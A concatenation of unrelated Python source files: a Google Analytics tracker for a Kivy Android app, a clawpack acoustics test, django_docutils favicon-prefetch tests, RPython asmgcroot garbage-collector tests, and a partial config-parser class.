"77237",
"77253",
"77272",
"77280",
"77292",
"77317",
"77319",
"77322",
"77333",
"77334",
"77354",
"77369",
"77377",
"77389",
"77411",
"77441",
"77484",
"77529",
"77537",
"77538",
"77563",
"77564",
"77570",
"77595",
"77609",
"77644",
"77646",
"77658",
"77683",
"77687",
"77702",
"77713",
"77721",
"77743",
"77745",
"77746",
"77748",
"77750",
"77751",
"77752",
"77759",
"77783",
"77820",
"77838",
"77845",
"77854",
"77880",
"77896",
"77912",
"77932",
"77934",
"77936",
"77940",
"77941",
"77951",
"77991",
"77995",
"77997",
"77999",
"78001",
"78003",
"78014",
"78018",
"78041",
"78048",
"78054",
"78057",
"78059",
"78075",
"78080",
"78087",
"78095",
"78109",
"78119",
"78137",
"78140",
"78163",
"78164",
"78167",
"78209",
"78221",
"78222",
"78223",
"78249",
"78252",
"78257",
"78274",
"78280",
"78283",
"78336",
"78337",
"78339",
"78342",
"78354",
"78370",
"78371",
"78375",
"78389",
"78423",
"78434",
"78482",
"78496",
"78519",
"78522",
"78525",
"78529",
"78556",
"78567",
"78578",
"78579",
"78582",
"78587",
"78589",
"78593",
"78595",
"78605",
"78617",
"78637",
"78674",
"78721",
"78722",
"78754",
"78767",
"78773",
"78784",
"78785",
"78811",
"78828",
"78862",
"78877",
"78883",
"78899",
"78903",
"78909",
"78924",
"78930",
"78935",
"78948",
"78971",
"78988",
"78994",
"79003",
"79037",
"79044",
"79089",
"79094",
"79101",
"79105",
"79112",
"79120",
"79145",
"79165",
"79188",
"79193",
"79230",
"79231",
"79236",
"79237",
"79275",
"79303",
"79305",
"79306",
"79310",
"79318",
"79343",
"79351",
"79352",
"79358",
"79376",
"79387",
"79391",
"79398",
"79431",
"79452",
"79454",
"79471",
"79501",
"79515",
"79525",
"79530",
"79532",
"79534",
"79550",
"79553",
"79566",
"79568",
"79583",
"79584",
"79611",
"79614",
"79634",
"79642",
"79651",
"79672",
"79681",
"79726",
"79737",
"79740",
"79766",
"79785",
"79787",
"79793",
"79818",
"79829",
"79840",
"79843",
"79858",
"79865",
"79920",
"79938",
"79959",
"79966",
"79971",
"79981",
"80001",
"80008",
"80026",
"80029",
"80049",
"80059",
"80068",
"80069",
"80116",
"80125",
"80141",
"80149",
"80150",
"80156",
"80162",
"80164",
"80169",
"80191",
"80194",
"80204",
"80216",
"80236",
"80244",
"80245",
"80262",
"80268",
"80275",
"80278",
"80296",
"80302",
"80307",
"80309",
"80311",
"80314",
"80317",
"80319",
"80320",
"80330",
"80344",
"80348",
"80369",
"80383",
"80386",
"80399",
"80408",
"80411",
"80414",
"80418",
"80419",
"80428",
"80451",
"80468",
"80481",
"80485",
"80492",
"80499",
"80519",
"80525",
"80526",
"80534",
"80540",
"80573",
"80580",
"80587",
"80589",
"80618",
"80631",
"80634",
"80635",
"80647",
"80679",
"80681",
"80702",
"80725",
"80732",
"80744",
"80765",
"80766",
"80817",
"80852",
"80854",
"80858",
"80875",
"80894",
"80899",
"80913",
"80919",
"80945",
"80965",
"80974",
"80986",
"81075",
"81083",
"81087",
"81103",
"81104",
"81140",
"81143",
"81147",
"81150",
"81160",
"81176",
"81178",
"81184",
"81185",
"81201",
"81204",
"81206",
"81209",
"81216",
"81218",
"81219",
"81229",
"81254",
"81255",
"81286",
"81289",
"81309",
"81320",
"81338",
"81345",
"81355",
"81383",
"81387",
"81398",
"81400",
"81409",
"81422",
"81423",
"81425",
"81453",
"81479",
"81513",
"81521",
"81525",
"81529",
"81545",
"81564",
"81620",
"81621",
"81639",
"81649",
"81654",
"81669",
"81675",
"81686",
"81692",
"81711",
"81715",
"81732",
"81733",
"81749",
"81753",
"81757",
"81764",
"81792",
"81795",
"81797",
"81811",
"81818",
"81821",
"81824",
"81830",
"81838",
"81844",
"81851",
"81852",
"81854",
"81883",
"81888",
"81900",
"81904",
"81933",
"81934",
"81944",
"81952",
"82022",
"82024",
"82033",
"82037",
"82063",
"82082",
"82095",
"82105",
"82106",
"82123",
"82124",
"82139",
"82150",
"82193",
"82205",
"82219",
"82224",
"82230",
"82244",
"82276",
"82284",
"82293",
"82297",
"82324",
"82352",
"82366",
"82389",
"82455",
"82459",
"82477",
"82503",
"82522",
"82539",
"82562",
"82565",
"82621",
"82629",
"82648",
"82668",
"82686",
"82698",
"82711",
"82724",
"82729",
"82731",
"82735",
"82738",
"82758",
"82807",
"82808",
"82812",
"82814",
"82819",
"82834",
"82884",
"82894",
"82898",
"82917",
"82924",
"82935",
"83003",
"83027",
"83075",
"83094",
"83100",
"83175",
"83188",
"83199",
"83235",
"83298",
"83301",
"83342",
"83360",
"83368",
"83372",
"83373",
"83394",
"83396",
"83405",
"83425",
"83445",
"83447",
"83451",
"83481",
"83511",
"83521",
"83524",
"83530",
"83592",
"83595",
"83604",
"83628",
"83683",
"83764",
"83788",
"83790",
"83804",
"83824",
"83830",
"83845",
"83852",
"83868",
"83879",
"83883",
"83898",
"83918",
"83949",
"83951",
"83957",
"83958",
"83971",
"83984",
"83989",
"84027",
"84029",
"84039",
"84045",
"84062",
"84072",
"84074",
"84088",
"84090",
"84092",
"84098",
"84104",
"84107",
"84120",
"84136",
"84145",
"84146",
"84153",
"84167",
"84169",
"84174",
"84188",
"84190",
"84212",
"84219",
"84240",
"84244",
"84253",
"84254",
"84273",
"84289",
"84312",
"84317",
"84324",
"84338",
"84355",
"84356",
"84360",
"84369",
"84372",
"84387",
"84408",
"84422",
"84462",
"84464",
"84466",
"84489",
"84525",
"84536",
"84546",
"84554",
"84561",
"84569",
"84592",
"84593",
"84602",
"84614",
"84615",
"84642",
"84683",
"84686",
"84694",
"84742",
"84744",
"84748",
"84749",
"84752",
"84760",
"84769",
"84820",
"84843",
"84851",
"84854",
"84919",
"84921",
"84925",
"84966",
"84975",
"84980",
"84981",
"85018",
"85038",
"85079",
"85097",
"85114",
"85115",
"85119",
"85124",
"85143",
"85247",
"85258",
"85272",
"85274",
"85281",
"85290",
"85294",
"85325",
"85350",
"85354",
"85386",
"85392",
"85402",
"85413",
"85420",
"85423",
"85458",
"85460",
"85464",
"85465",
"85469",
"85491",
"85495",
"85497",
"85501",
"85508",
"85521",
"85547",
"85553",
"85566",
"85576",
"85580",
"85590",
"85591",
"85597",
"85605",
"85621",
"85623",
"85642",
"85669",
"85681",
"85695",
"85709",
"85717",
"85720",
"85743",
"85752",
"85781",
"85798",
"85799",
"85802",
"85804",
"85817",
"85819",
"85858",
"85867",
"85903",
"85945",
"85957",
"85965",
"85980",
"85985",
"85987",
"85990",
"86000",
"86045",
"86060",
"86074",
"86075",
"86088",
"86097",
"86098",
"86115",
"86134",
"86144",
"86156",
"86192",
"86196",
"86197",
"86235",
"86237",
"86239",
"86245",
"86261",
"86277",
"86284",
"86291",
"86340",
"86343",
"86364",
"86386",
"86389",
"86397",
"86431",
"86454",
"86457",
"86475",
"86489",
"86510",
"86517",
"86534",
"86549",
"86552",
"86557",
"86575",
"86594",
"86607",
"86614",
"86622",
"86653",
"86668",
"86693",
"86696",
"86697",
"86699",
"86704",
"86708",
"86719",
"86749",
"86787",
"86788",
"86796",
"86798",
"86801",
"86820",
"86830",
"86853",
"86867",
"86871",
"86888",
"86893",
"86894",
"86896",
"86909",
"86913",
"86933",
"86938",
"86944",
"86955",
"86964",
"86971",
"86992",
"86997",
"87018",
"87021",
"87023",
"87039",
"87042",
"87057",
"87066",
"87098",
"87113",
"87149",
"87172",
"87175",
"87219",
"87237",
"87272",
"87280",
"87292",
"87317",
"87319",
"87334",
"87354",
"87377",
"87395",
"87397",
"87411",
"87441",
"87529",
"87534",
"87537",
"87538",
"87564",
"87570",
"87595",
"87609",
"87644",
"87646",
"87658",
"87671",
"87682",
"87683",
"87687",
"87702",
"87713",
"87721",
"87743",
"87745",
"87746",
"87748",
"87750",
"87752",
"87783",
"87820",
"87838",
"87841",
"87845",
"87854",
"87880",
"87896",
"87912",
"87934",
"87936",
"87940",
"87941",
"87991",
"87995",
"87999",
"88001",
"88003",
"88014",
"88018",
"88041",
"88048",
"88054",
"88059",
"88075",
"88087",
"88095",
"88109",
"88119",
"88124",
"88137",
"88140",
"88163",
"88164",
"88167",
"88209",
"88221",
"88222",
"88223",
"88239",
"88252",
"88274",
"88280",
"88283",
"88336",
"88337",
"88339",
"88342",
"88354",
"88370",
"88371",
"88375",
"88389",
"88430",
"88434",
"88466",
"88482",
"88522",
"88525",
"88529",
"88556",
"88567",
"88578",
"88579",
"88582",
"88589",
"88593",
"88595",
"88605",
"88617",
"88637",
"88674",
"88721",
"88722",
"88754",
"88767",
"88773",
"88784",
"88785",
"88811",
"88828",
"88862",
"88877",
"88883",
"88903",
"88909",
"88924",
"88930",
"88948",
"88971",
"88988",
"88994",
"89003",
"89089",
"89094",
"89101",
"89120",
"89145",
"89188",
"89193",
"89230",
"89231",
"89236",
"89237",
"89252",
"89275",
"89303",
"89305",
"89306",
"89309",
"89310",
"89343",
"89351",
"89352",
"89387",
"89391",
"89398",
"89431",
"89452",
"89454",
"89501",
"89515",
"89532",
"89534",
"89550",
"89583",
"89584",
"89614",
"89634",
"89642",
"89651",
"89672",
"89681",
"89726",
"89737",
"89740",
"89766",
"89785",
"89793",
"89818",
"89829",
"89840",
"89843",
"89858",
"89865",
"89920",
"89938",
"89959",
"89971",
"89981",
"90001",
"90008",
"90026",
"90049",
"90056",
"90059",
"90069",
"90116",
"90125",
"90128",
"90141",
"90150",
"90162",
"90163",
"90164",
"90169",
"90191",
"90193",
"90194",
"90216",
"90236",
"90238",
"90262",
"90268",
"90275",
"90278",
"90296",
"90297",
"90302",
"90307",
"90309",
"90311",
"90314",
"90319",
"90320",
"90323",
"90325",
"90336",
"90344",
"90369",
"90381",
"90383",
"90399",
"90408",
"90411",
"90414",
"90418",
"90419",
"90428",
"90444",
"90451",
"90468",
"90485",
"90492",
"90499",
"90519",
"90522",
"90525",
"90526",
"90534",
"90540",
"90573",
"90584",
"90586",
"90587",
"90589",
"90618",
"90631",
"90634",
"90635",
"90681",
"90725",
"90728",
"90732",
"90744",
"90757",
"90765",
"90766",
"90817",
"90852",
"90854",
"90875",
"90894",
"90899",
"90913",
"90918",
"90919",
"90965",
"90982",
"90986",
"91075",
"91083",
"91087",
"91104",
"91135",
"91143",
"91147",
"91160",
"91176",
"91178",
"91201",
"91204",
"91206",
"91209",
"91216",
"91218",
"91219",
"91229",
"91233",
"91254",
"91278",
"91286",
"91289",
"91294",
"91320",
"91364",
"91379",
"91387",
"91398",
"91403",
"91409",
"91421",
"91423",
"91439",
"91453",
"91495",
"91521",
"91523",
"91525",
"91529",
"91545",
"91564",
"91590",
"91620",
"91632",
"91639",
"91649",
"91654",
"91669",
"91675",
"91685",
"91686",
"91692",
"91711",
"91715",
"91721",
"91732",
"91749",
"91757",
"91764",
"91767",
"91782",
"91818",
"91821",
"91824",
"91830",
"91838",
"91844",
"91851",
"91852",
"91854",
"91869",
"91877",
"91904",
"91933",
"91934",
"91944",
"91952",
"92005",
"92022",
"92024",
"92033",
"92046",
"92105",
"92106",
"92123",
"92124",
"92139",
"92150",
"92160",
"92185",
"92205",
"92219",
"92244",
"92255",
"92258",
"92276",
"92284",
"92291",
"92293",
"92297",
"92324",
"92366",
"92444",
"92455",
"92459",
"92477",
"92503",
"92532",
"92562",
"92565",
"92621",
"92629",
"92648",
"92668",
"92686",
"92704",
"92724",
"92738",
"92807",
"92808",
"92812",
"92814",
"92819",
"92834",
"92884",
"92898",
"92917",
"92924",
"92935",
"93003",
"93027",
"93075",
"93109",
"93175",
"93235",
"93289",
"93292",
"93298",
"93301",
"93318",
"93342",
"93360",
"93368",
"93372",
"93394",
"93405",
"93425",
"93445",
"93447",
"93451",
"93481",
"93511",
"93521",
"93524",
"93592",
"93595",
"93604",
"93617",
"93622",
"93628",
"93629",
"93683",
"93788",
"93790",
"93804",
"93824",
"93830",
"93868",
"93879",
"93883",
"93951",
"93957",
"93959",
"93971",
"94004",
"94027",
"94029",
"94039",
"94062",
"94074",
"94088",
"94090",
"94092",
"94098",
"94104",
"94106",
"94107",
"94120",
"94136",
"94145",
"94153",
"94167",
"94174",
"94188",
"94190",
"94212",
"94240",
"94244",
"94253",
"94254",
"94267",
"94273",
"94286",
"94289",
"94312",
"94324",
"94338",
"94355",
"94369",
"94372",
"94408",
"94422",
"94435",
"94462",
"94464",
"94466",
"94489",
"94525",
"94536",
"94546",
"94554",
"94569",
"94593",
"94597",
"94602",
"94614",
"94615",
"94642",
"94683",
"94686",
"94689",
"94694",
"94744",
"94748",
"94749",
"94752",
"94760",
"94769",
"94843",
"94854",
"94919",
"94921",
"94975",
"94980",
"94993",
"95010",
"95018",
"95038",
"95079",
"95114",
"95115",
"95119",
"95124",
"95167",
"95236",
"95241",
"95258",
"95271",
"95272",
"95281",
"95290",
"95294",
"95325",
"95354",
"95386",
"95391",
"95392",
"95402",
"95413",
"95420",
"95423",
"95460",
"95464",
"95465",
"95491",
"95495",
"95497",
"95501",
"95508",
"95521",
"95566",
"95576",
"95591",
"95597",
"95605",
"95621",
"95623",
"95625",
"95669",
"95681",
"95709",
"95717",
"95743",
"95752",
"95781",
"95799",
"95802",
"95804",
"95817",
"95819",
"95858",
"95867",
"95888",
"95903",
"95933",
"95945",
"95965",
"95975",
"95980",
"95985",
"95990",
"96000",
"96045",
"96060",
"96074",
"96075",
"96088",
"96098",
"96115",
"96134",
"96144",
"96192",
"96196",
"96197",
"96237",
"96239",
"96240",
"96245",
"96277",
"96284",
"96291",
"96294",
"96340",
"96343",
"96364",
"96386",
"96389",
"96431",
"96444",
"96457",
"96489",
"96497",
"96517",
"96534",
"96539",
"96549",
"96557",
"96575",
"96594",
"96607",
"96614",
"96622",
"96653",
"96668",
"96693",
"96696",
"96697",
"96699",
"96719",
"96723",
"96749",
"96787",
"96788",
"96798",
"96801",
"96820",
"96830",
"96853",
"96867",
"96871",
"96893",
"96894",
"96896",
"96909",
"96933",
"96938",
"96955",
"96964",
"96971",
"96984",
"96992",
"96997",
"97021",
"97023",
"97039",
"97042",
"97057",
"97066",
"97098",
"97113",
"97137",
"97172",
"97207",
"97219",
"97253",
"97272",
"97292",
"97317",
"97319",
"97322",
"97333",
"97334",
"97354",
"97395",
"97411",
"97441",
)
PACKAGE_STATUSES = (
'Manifest',
'In-Transit',
'Exception',
'Out for Delivery',
'Ready for Pickup',
'Delivered',
'Void',
)
with open('spring/dictionary.txt') as fh:
LOREM = fh.read()
with open('spring/garbage.txt') as fh:
GARBAGE = fh.read()
|
1690424
|
from tracking.abstract import AbstractTracker
from jnius import autoclass, JavaException
ScreenViewBuilder = autoclass('com.google.android.gms.analytics.HitBuilders$ScreenViewBuilder')
EventBuilder = autoclass('com.google.android.gms.analytics.HitBuilders$EventBuilder')
GoogleAnalytics = autoclass('com.google.android.gms.analytics.GoogleAnalytics')
PythonActivity = autoclass('org.kivy.android.PythonActivity')
AndroidString = autoclass('java.lang.String')
class GoogleTracker(AbstractTracker):
def __init__(self):
self.tracker = None
def _get_tracker(self):
if self.tracker:
return self.tracker
import settings
try:
app = PythonActivity.getApplication()
analytics = GoogleAnalytics.getInstance(app)
if settings.DEVELOPMENT_VERSION:
analytics.setDryRun(True)
tracker = analytics.newTracker(AndroidString(settings.GOOGLE_ANALYTICS_TRACKING_ID))
tracker.setSessionTimeout(300)
tracker.enableAdvertisingIdCollection(True)
except JavaException:
return None
self.tracker = tracker
return tracker
def send_screen(self, screen):
super(GoogleTracker, self).send_screen(screen)
tracker = self._get_tracker()
if not tracker:
return
tracker.setScreenName(AndroidString(screen.name))
tracker.send(ScreenViewBuilder().build())
def clear_screen(self):
super(GoogleTracker, self).clear_screen()
tracker = self._get_tracker()
if not tracker:
return
tracker.setScreenName(None)
def send_event(self, category, action, label=None, value=None):
super(GoogleTracker, self).send_event(category, action, label)
tracker = self._get_tracker()
if not tracker:
return
event = EventBuilder().setCategory(category).setAction(action)
if label:
event.setLabel(label)
if value:
event.setValue(int(value))
tracker.send(event.build())
def send_to_server(self):
super(GoogleTracker, self).send_to_server()
GoogleAnalytics.getInstance(PythonActivity.getBaseContext()).dispatchLocalHits()
|
1690431
|
from __future__ import absolute_import
def test_1d_acoustics():
"""test_1d_acoustics
tests against known classic, sharpclaw, and high-order weno results """
from . import acoustics_1d
def verify_expected(expected):
""" binds the expected value to the acoustics_verify methods """
def acoustics_verify(claw):
from clawpack.pyclaw.util import check_diff
import numpy as np
# tests are done across the entire domain of q normally
q0 = claw.frames[0].state.get_q_global()
qfinal = claw.frames[claw.num_output_times].state.get_q_global()
# and q_global is only returned on process 0
if q0 is not None and qfinal is not None:
q0 = q0.reshape([-1])
qfinal = qfinal.reshape([-1])
dx = claw.solution.domain.grid.delta[0]
test = dx*np.sum(np.abs(qfinal-q0))
return check_diff(expected, test, abstol=1e-4)
else:
return
return acoustics_verify
from clawpack.pyclaw.util import gen_variants
classic_tests = gen_variants(acoustics_1d.setup, verify_expected(0.001049),
kernel_languages=('Python', 'Fortran'),
solver_type='classic', disable_output=True)
time_step_test = gen_variants(acoustics_1d.setup, verify_expected(0.002020),
kernel_languages=('Python',),
solver_type='classic', disable_output=True,
output_style=(3))
ptwise_tests = gen_variants(acoustics_1d.setup, verify_expected(0.001049),
kernel_languages=('Fortran',), ptwise=True,
solver_type='classic', disable_output=True)
sharp_tests_rk = gen_variants(acoustics_1d.setup, verify_expected(0.000299),
kernel_languages=('Python', 'Fortran'),
solver_type='sharpclaw',
time_integrator='SSP104', disable_output=True)
sharp_tests_lmm = gen_variants(acoustics_1d.setup,
verify_expected(0.000231),
kernel_languages=('Python', 'Fortran'),
solver_type='sharpclaw',
time_integrator='SSPLMMk3',
disable_output=True)
weno_tests = gen_variants(acoustics_1d.setup, verify_expected(0.000153),
kernel_languages=('Fortran',),
solver_type='sharpclaw', time_integrator='SSP104',
weno_order=17, disable_output=True)
from itertools import chain
for test in chain(classic_tests, time_step_test, ptwise_tests,
sharp_tests_rk, sharp_tests_lmm, weno_tests):
yield test
if __name__ == "__main__":
import nose
nose.main()
|
1690485
|
import pytest
import responses
from django.core.files.uploadedfile import SimpleUploadedFile
from docutils.nodes import document
from inmemorystorage.storage import InMemoryFile
from django_docutils.favicon.prefetch import (
is_favicon_stored,
prefetch_favicon,
yield_page_doctrees,
yield_references,
)
from django_docutils.lib.publisher import publish_doctree
TEST_RST_DOCUMENT = """
Developing
==========
- Make a hobby website in django or flask.
Services like `Heroku`_ are free to try, and simple to deploy Django
websites to.
- For free editors, check out good old `vim`_, `Visual Studio Code`_,
`Atom`_, or `PyCharm`_
.. _Visual Studio Code: https://code.visualstudio.com/
.. _Atom: https://atom.io/
.. _vim: http://vim.org
.. _PyCharm: https://www.jetbrains.com/pycharm/
"""
def test_yield_references():
document = publish_doctree(TEST_RST_DOCUMENT)
assert set(yield_references(document)) == {
'https://code.visualstudio.com/',
'https://atom.io/',
'http://vim.org',
'https://www.jetbrains.com/pycharm/',
}
def test_yield_references_patterns():
document = publish_doctree(TEST_RST_DOCUMENT)
assert set(yield_references(document, url_pattern='atom')) == {'https://atom.io/'}
@pytest.mark.django_db(transaction=True)
def test_yield_page_doctrees(RSTPostPage):
RSTPostPage.objects.create(subtitle='lol', body=TEST_RST_DOCUMENT)
assert RSTPostPage.objects.filter(subtitle='lol').count()
page_doctrees = list(yield_page_doctrees(RSTPostPage))
assert len(page_doctrees)
for page in page_doctrees:
assert isinstance(page, document)
@pytest.mark.django_db(transaction=True)
@responses.activate
def test_prefetch_favicon_working():
url = 'http://vim.org'
favicon_url = f'{url}/images/favicon.ico'
favicon_content = b'lol'
responses.add(
responses.GET,
url,
body='<link rel="shortcut icon" href="{favicon_url}" />'.format(
favicon_url=favicon_url
),
status=200,
content_type='text/html',
)
responses.add(
responses.GET,
favicon_url,
body=favicon_content,
status=200,
content_type='image/ico',
)
favicon, created = prefetch_favicon(url)
assert favicon.favicon.read() == favicon_content
@pytest.mark.django_db(transaction=True)
@responses.activate
def test_prefetch_favicon_file_missing(monkeypatch):
# case where the favicon is in ORM, but file not in storage
url = 'http://vim.org'
favicon_url = f'{url}/images/favicon.ico'
favicon_content = b'lol'
responses.add(
responses.GET,
url,
body='<link rel="shortcut icon" href="{favicon_url}" />'.format(
favicon_url=favicon_url
),
status=200,
content_type='text/html',
)
responses.add(
responses.GET,
favicon_url,
body=favicon_content,
status=200,
content_type='image/ico',
)
def mock_file():
raise FileNotFoundError
favicon, created = prefetch_favicon(url)
import django_docutils.favicon.prefetch
assert not prefetch_favicon(url)
monkeypatch.setattr(
django_docutils.favicon.prefetch, 'is_favicon_stored', lambda fqdn: False
)
favicon, created = prefetch_favicon(url)
assert not created
@pytest.mark.django_db(transaction=True)
@responses.activate
def test_is_favicon_stored_file_missing(monkeypatch, Favicon):
# case where the favicon is in ORM, but file not in storage
url = 'http://vim.org'
fqdn = 'vim.org'
def mock_open(path, mode='r'):
raise FileNotFoundError
favicon = Favicon.objects.create(
domain=fqdn,
favicon=SimpleUploadedFile(
name=f'{fqdn}.ico', content=b'lol', content_type='image/ico',
),
)
assert not prefetch_favicon(url), 'File should not redownload'
monkeypatch.setattr(InMemoryFile, 'open', mock_open)
with pytest.raises(FileNotFoundError): # Assure monkeypatch
favicon.favicon.file
assert not is_favicon_stored(
favicon.domain
), 'favicon missing from storage should return False'
@pytest.mark.django_db(transaction=True)
@responses.activate
def test_is_favicon_stored_favicon_not_in_db(monkeypatch):
assert not is_favicon_stored(
'nonexistant_fqdn.com'
), 'favicon missing from database should return False'
|
1690505
|
import py
import sys, os, gc
from rpython.translator.c.test import test_newgc
from rpython.translator.translator import TranslationContext
from rpython.translator.c.genc import CStandaloneBuilder
from rpython.annotator.listdef import s_list_of_strings
from rpython.conftest import option
from rpython.translator.tool.cbuild import ExternalCompilationInfo
from rpython.translator.platform import platform as compiler
from rpython.rlib.rarithmetic import is_emulated_long
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rlib.entrypoint import entrypoint_highlevel, secondary_entrypoints
from rpython.rtyper.lltypesystem.lloperation import llop
_MSVC = compiler.name == "msvc"
_MINGW = compiler.name == "mingw32"
_WIN32 = _MSVC or _MINGW
_WIN64 = _WIN32 and is_emulated_long
# XXX get rid of 'is_emulated_long' and have a real config here.
class AbstractTestAsmGCRoot:
# the asmgcroot gc transformer doesn't generate gc_reload_possibly_moved
# instructions:
should_be_moving = False
@classmethod
def make_config(cls):
if _MSVC:
py.test.skip("all asmgcroot tests disabled for MSVC")
from rpython.config.translationoption import get_combined_translation_config
config = get_combined_translation_config(translating=True)
config.translation.gc = cls.gcpolicy
config.translation.gcrootfinder = "asmgcc"
config.translation.taggedpointers = getattr(cls, "taggedpointers", False)
return config
@classmethod
def _makefunc_str_int(cls, func):
def main(argv):
arg0 = argv[1]
arg1 = int(argv[2])
try:
res = func(arg0, arg1)
except MemoryError:
print 'Result: MemoryError'
else:
print 'Result: "%s"' % (res,)
return 0
config = cls.make_config()
t = TranslationContext(config=config)
a = t.buildannotator()
sec_ep = getattr(cls, 'secondary_entrypoints', [])
for f, inputtypes in sec_ep:
a.build_types(f, inputtypes, False)
a.build_types(main, [s_list_of_strings])
t.buildrtyper().specialize()
t.checkgraphs()
cbuilder = CStandaloneBuilder(t, main, config=config,
secondary_entrypoints=sec_ep)
c_source_filename = cbuilder.generate_source(
defines = cbuilder.DEBUG_DEFINES)
cls._patch_makefile(cbuilder.targetdir)
if option.view:
t.view()
exe_name = cbuilder.compile()
def run(arg0, arg1, runner=None):
if runner is not None:
py.test.skip("unsupported test: runner=%r" % (runner,))
lines = []
print >> sys.stderr, 'RUN: starting', exe_name, arg0, arg1
if sys.platform == 'win32':
redirect = ' 2> NUL'
else:
redirect = ''
if config.translation.shared and os.name == 'posix':
library_path = exe_name.dirpath()
if sys.platform == 'darwin':
env = 'DYLD_LIBRARY_PATH="%s" ' % library_path
else:
env = 'LD_LIBRARY_PATH="%s" ' % library_path
else:
env = ''
cwd = os.getcwd()
try:
os.chdir(str(exe_name.dirpath()))
g = os.popen(
'%s"%s" %s %d%s' % (env, exe_name, arg0, arg1, redirect), 'r')
finally:
os.chdir(cwd)
for line in g:
print >> sys.stderr, 'RUN:', line.rstrip()
lines.append(line)
g.close()
if not lines:
py.test.fail("no output from subprocess")
if not lines[-1].startswith('Result:'):
py.test.fail("unexpected output from subprocess")
result = lines[-1][len('Result:'):].strip()
if result == 'MemoryError':
raise MemoryError("subprocess got an RPython MemoryError")
if result.startswith('"') and result.endswith('"'):
return result[1:-1]
else:
return int(result)
return run
@classmethod
def _patch_makefile(cls, targetdir):
# for testing, patch the Makefile to add the -r option to
# trackgcroot.py.
makefile = targetdir.join('Makefile')
f = makefile.open()
lines = f.readlines()
f.close()
found = False
for i in range(len(lines)):
if 'trackgcroot.py' in lines[i]:
lines[i] = lines[i].replace('trackgcroot.py',
'trackgcroot.py -r')
found = True
assert found
f = makefile.open('w')
f.writelines(lines)
f.close()
if sys.platform == 'win32':
def test_callback_with_collect(self):
py.test.skip("No libffi yet with mingw32")
def define_callback_with_collect(cls):
return lambda: 0
class TestAsmGCRootWithSemiSpaceGC(AbstractTestAsmGCRoot,
test_newgc.TestSemiSpaceGC):
# for the individual tests see
# ====> ../../test/test_newgc.py
secondary_entrypoints = []
def define_large_function(cls):
class A(object):
def __init__(self):
self.x = 0
d = dict(A=A)
exec ("def g(a):\n" +
" a.x += 1\n" * 1000 +
" return A()\n"
) in d
g = d['g']
def f():
a = A()
g(a)
return a.x
return f
def test_large_function(self):
res = self.run('large_function')
assert res == 1000
def define_callback_simple(cls):
c_source = py.code.Source("""
int mystuff(int(*cb)(int, int))
{
return cb(40, 2) + cb(3, 4);
}
""")
eci = ExternalCompilationInfo(separate_module_sources=[c_source])
S = lltype.GcStruct('S', ('x', lltype.Signed))
CALLBACK = lltype.FuncType([lltype.Signed, lltype.Signed],
lltype.Signed)
z = rffi.llexternal('mystuff', [lltype.Ptr(CALLBACK)], lltype.Signed,
compilation_info=eci)
def mycallback(a, b):
gc.collect()
return a + b
def f():
p = lltype.malloc(S)
p.x = 100
result = z(mycallback)
return result * p.x
return f
def test_callback_simple(self):
res = self.run('callback_simple')
assert res == 4900
def define_secondary_entrypoint_callback(cls):
# XXX this is baaaad, cleanup global state
try:
del secondary_entrypoints["x42"]
except KeyError:
pass
@entrypoint_highlevel("x42", [lltype.Signed, lltype.Signed],
c_name='callback')
def mycallback(a, b):
gc.collect()
return a + b
c_source = py.code.Source("""
int mystuff2()
{
return callback(40, 2) + callback(3, 4);
}
""")
eci = ExternalCompilationInfo(separate_module_sources=[c_source])
z = rffi.llexternal('mystuff2', [], lltype.Signed,
compilation_info=eci)
S = lltype.GcStruct('S', ('x', lltype.Signed))
cls.secondary_entrypoints = secondary_entrypoints["x42"]
def f():
p = lltype.malloc(S)
p.x = 100
result = z()
return result * p.x
return f
def test_secondary_entrypoint_callback(self):
res = self.run('secondary_entrypoint_callback')
assert res == 4900
class TestAsmGCRootWithSemiSpaceGC_Mingw32(TestAsmGCRootWithSemiSpaceGC):
# for the individual tests see
# ====> ../../test/test_newgc.py
@classmethod
def setup_class(cls):
if sys.platform != 'win32':
py.test.skip("mingw32 specific test")
if not ('mingw' in os.popen('gcc --version').read() and
'GNU' in os.popen('make --version').read()):
py.test.skip("mingw32 and MSYS are required for this test")
test_newgc.TestSemiSpaceGC.setup_class.im_func(cls)
@classmethod
def make_config(cls):
config = TestAsmGCRootWithSemiSpaceGC.make_config()
config.translation.cc = 'mingw32'
return config
def test_callback_with_collect(self):
py.test.skip("No libffi yet with mingw32")
def define_callback_with_collect(cls):
return lambda: 0
#class TestAsmGCRootWithSemiSpaceGC_Shared(TestAsmGCRootWithSemiSpaceGC):
# @classmethod
# def make_config(cls):
# config = TestAsmGCRootWithSemiSpaceGC.make_config()
# config.translation.shared = True
# return config
class TestAsmGCRootWithHybridTagged(AbstractTestAsmGCRoot,
test_newgc.TestHybridTaggedPointers):
pass
class TestAsmGCRootWithIncrementalMinimark(AbstractTestAsmGCRoot,
test_newgc.TestIncrementalMiniMarkGC):
pass
|
1690546
|
import os
import json
import configparser
from ssr.utility.logging_extension import logger
_config = None
class SSRConfig:
default_section = "DEFAULT"
comment_symbol = "#"
@staticmethod
def get_instance():
assert _config is not None
return _config
@staticmethod
def set_instance(config):
global _config
_config = config
def __init__(self, config_fp, working_file_suffix=None):
self.config_fp = config_fp
self.config = configparser.RawConfigParser()
if not os.path.isfile(self.config_fp):
abs_path = os.path.abspath(os.path.dirname(self.config_fp))
if not os.path.isdir(abs_path):
logger.vinfo("abs_path", abs_path)
assert False # config folder missing
open(self.config_fp, "a").close()
else:
self.config.read(self.config_fp)
if working_file_suffix is not None:
self.path_to_working_copy = self.config_fp + working_file_suffix
else:
self.path_to_working_copy = self.config_fp
def add_option_value_pairs(self, pair_list, section=None):
"""
:param tuple_list: ('option', 'Value')
:return:
"""
if section is None:
section = SSRConfig.default_section
elif not self.config.has_section(section):
self.config.add_section(section)
for pair in pair_list:
option, value = pair
self.config.set(section, option, value)
@staticmethod
def detect_missing_commas(list_str):
repaired_string = list_str.replace('"\n"', '",\n"')
return repaired_string
@staticmethod
def remove_appended_commas(list_str):
repaired_string = list_str.replace('",\n]', '"\n]')
return repaired_string
def get_option_value(self, option, target_type, section=None):
"""
:param section:
:param option:
:param target_type:
:return:
"""
if section is None:
section = SSRConfig.default_section
try:
if target_type == list:
option_str = self.config.get(section, option)
option_str = SSRConfig.detect_missing_commas(option_str)
option_str = SSRConfig.remove_appended_commas(option_str)
result = json.loads(option_str)
else:
option_str = self.config.get(section, option)
option_str = option_str.split("#")[0].rstrip()
if (
target_type == bool
): # Allow True/False bool values in addition to 1/0
result = (
option_str == "True"
or option_str == "T"
or option_str == "1"
)
else:
